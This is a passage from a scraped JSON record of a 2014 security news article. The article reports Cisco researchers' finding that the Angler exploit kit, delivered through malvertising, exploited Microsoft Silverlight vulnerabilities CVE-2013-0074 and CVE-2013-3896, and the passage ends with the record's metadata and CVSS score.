[spotted](<https://blogs.cisco.com/security/angling-for-silverlight-exploits>) by the Cisco researcher spiked since April 23, targeting Microsoft\u2019s Silverlight by imposing the exploits on the infected systems. 
The Exploit Kit in this campaign also hosts exploits for Flash and Java, but it doesn't trigger them, which at a time was one of the widely targeted platform by the exploit kits developers.\n\n \n\n\n\"_Exploit kit owners are adding Silverlight to their update releases, and since 23 April we have observed substantial traffic - often from malvertising - being driven to Angler instances partially using Silverlight exploits_,\" said Gundert, the lead threat researcher at Cisco.\n\n \n\n\nThe cyber criminals are infiltrating the Advertising Networks with malvertising to redirect victims to the hundreds of malicious websites hosting the Angler Exploit Kit, where the actual attack comes into play by silently launching Silverlight exploits against the infected system.\n\n[](<https://3.bp.blogspot.com/-dMh-lqkMM54/U3yiBjM5mVI/AAAAAAAAbvk/XBrCwCDr1Ts/s1600/Ad-Exchange-flow.png>)\n\nTill now, The [Exploit Kit](<https://thehackernews.com/search/label/exploit%20kit>) (EK) developers were targeting the [vulnerabilities](<https://thehackernews.com/search/label/Vulnerability>) in Adobe Flash and Oracle Java, but as the public awareness and pathing efforts of both the two firms has increased, the malware developers have switched to the Microsoft\u2019s Silverlight.\n\n \n\n\n\u201c_Java and Flash have been heavily exploited over the years, and vendors are getting good at writing engines that detect vulnerabilities in those libraries_,\u201d said the Cisco researcher Craig Williams. \u201c_Silverlight has not been exploited much. There are some limited CVEs, but few are widespread. What we may be seeing here is a tipping point where Java exploits are being detected and what other formats can hackers take advantage of_.\u201d\n\n[](<https://1.bp.blogspot.com/-KuJsqyynLnI/U3yiIwSapdI/AAAAAAAAbvs/hajh-Ij4eNw/s1600/Angler-Attack-flow.png>)\n\nLevi Gundert , Technical lead at Cisco Threat Research observed that the Angler campaign exploits two known Silverlight vulnerabilities i.e. 
\n\n * CVE-2013-0074 - which gives attackers the ability to remotely execute malicious code\n * CVE-2013-3896 - it allows to bypass Data Execution Prevention (DEP), a security mitigation added to most Microsoft applications.\n\n> \"_We should expect these existing Silverlight exploits to proliferate through other exploit pack families in the near future as threat actors copy code from each other and release updates_,\" Gundert wrote.\n\n> \"_Silverlight exploits are also ideal because Silverlight continues to gain rich Internet application market share, perhaps surpassing Java, and Microsoft\u2019s life cycle schedule suggests Silverlight 5 will be supported through October, 2021_.\"\n\nThe security firm didn't expose the names of compromised websites serving the exploit kit. The Angler exploit kit managers were expected to be of the same group that was behind the infamous [Reveton ransomware](<https://thehackernews.com/2013/02/group-behind-largest-ransomware.html>).\n", "modified": "2014-05-21T12:59:24", "published": "2014-05-21T01:59:00", "id": "THN:BC65D2F30C85103414F6BD1EC204BB05", "href": "https://thehackernews.com/2014/05/netflix-users-targeted-by-microsoft.html", "type": "thn", "title": "Netflix Users Targeted by Microsoft Silverlight Exploits", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}